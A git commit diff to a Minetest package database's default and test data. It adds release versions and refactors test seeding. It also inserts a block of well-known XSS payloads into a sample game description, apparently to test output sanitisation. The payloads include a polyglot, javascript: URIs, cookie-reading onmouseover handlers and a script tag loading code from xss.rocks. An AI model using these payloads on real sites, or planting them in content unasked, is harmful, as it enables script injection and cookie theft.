Fix crash on bad wtforms validator instace

[cheatdb.git] / app / default_data.py

diff --git a/app/default_data.py b/app/default_data.py
index 6c0fdad2e4e9a2cff6bb1212881e5566a2b86102..eb8aec6f75c1f3dd4995c133a60ce590d96d62af 100644 (file)
--- a/app/default_data.py
+++ b/app/default_data.py
@@ -11,6 +11,11 @@ def populate(session):
        admin_user.rank = UserRank.ADMIN
        session.add(admin_user)
 
+       session.add(MinetestRelease("None", 0))
+       session.add(MinetestRelease("0.4.16/17", 32))
+       session.add(MinetestRelease("5.0", 37))
+       session.add(MinetestRelease("5.1", 38))
+
        tags = {}
        for tag in ["Inventory", "Mapgen", "Building", \
                        "Mobs and NPCs", "Tools", "Player effects", \
@@ -34,7 +39,14 @@ def populate(session):
                session.add(row)
 
 
-def populate_test_data(session, licenses, tags, admin_user):
+def populate_test_data(session):
+       licenses = { x.name : x for x in License.query.all() }
+       tags = { x.name : x for x in Tag.query.all() }
+       admin_user = User.query.filter_by(rank=UserRank.ADMIN).first()
+       v4 = MinetestRelease.query.filter_by(protocol=32).first()
+       v50 = MinetestRelease.query.filter_by(protocol=37).first()
+       v51 = MinetestRelease.query.filter_by(protocol=38).first()
+
        ez = User("Shara")
        ez.github_username = "Ezhh"
        ez.forums_username = "Shara"
@@ -105,6 +117,7 @@ awards.register_achievement("award_mesefind",{
 
        rel = PackageRelease()
        rel.package = mod1
+       rel.min_rel = v51
        rel.title = "v1.0.0"
        rel.url = "https://github.com/rubenwardy/awards/archive/master.zip"
        rel.approved = True
@@ -218,6 +231,7 @@ No warranty is provided, express or implied, for any part of the project.
        rel = PackageRelease()
        rel.package = mod
        rel.title = "v1.0.0"
+       rel.max_rel = v4
        rel.url = "https://github.com/ezhh/handholds/archive/master.zip"
        rel.approved = True
        session.add(rel)
@@ -290,6 +304,38 @@ No warranty is provided, express or implied, for any part of the project.
        game1.desc = """
 As seen on the Capture the Flag server (minetest.rubenwardy.com:30000)
 
+` `[`javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/`](javascript:/*--%3E%3C/title%3E%3C/style%3E%3C/textarea%3E%3C/script%3E%3C/xmp%3E%3Csvg/onload='+/%22/+/onmouseover=1/+/)`[*/[]/+alert(1)//'>`
+
+<IMG SRC="javascript:alert('XSS');">
+
+<IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)>
+
+``<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>``
+
+\<a onmouseover="alert(document.cookie)"\>xxs link\</a\>
+
+\<a onmouseover=alert(document.cookie)\>xxs link\</a\>
+
+<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+
+<script>alert("hello");</script>
+
+<SCRIPT SRC=`[`http://xss.rocks/xss.js></SCRIPT>`](http://xss.rocks/xss.js%3E%3C/SCRIPT%3E)`;`
+
+`<IMG \"\"\">`
+
+<SCRIPT>
+
+alert("XSS")
+
+</SCRIPT>
+
+<IMG SRC= onmouseover="alert('xxs')">
+
+<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
+
+"\>
+
 Uses the CTF PvP Engine.
 """